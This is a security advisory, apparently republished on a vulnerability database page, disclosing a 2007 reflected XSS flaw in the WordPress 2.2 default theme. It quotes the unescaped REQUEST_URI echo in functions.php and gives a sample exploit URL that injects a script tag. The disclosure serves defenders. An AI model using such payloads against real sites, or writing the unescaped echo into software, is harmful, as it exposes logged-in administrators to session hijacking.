Lucene search
K

wordpresstheme-xss.txt

🗓️ 11 Jun 2007 00:00:00Reported by John SmithType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 24 Views

There's an XSS in the Wordpress default theme, version 2.2, in functions.php at line 387

Code
`There is an XSS in the Wordpress default theme. Tested on WordPress version 2.2  
  
Filename functions.php, line 387.  
Code:  
  
<form style="display: inline" method="post" name="hicolor"  
id="hicolor" action="<?php echo $_SERVER['REQUEST_URI']; ?>">  
  
$_SERVER['REQUEST_URI'] is directly echoed to the user.  
  
This problem can be exploited if the adminstrator is logged in.  
  
Sample exploit URL.  
http://www.example.com/wp-admin/themes.php?page=functions.php&zmx"><script>alert(1)</script>  
  
There are other XSS vulnerabilities in popular Wordpress themes.  
More details on http://www.xssnews.com/  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Jun 2007 00:00Current
7.4High risk
Vulners AI Score7.4
24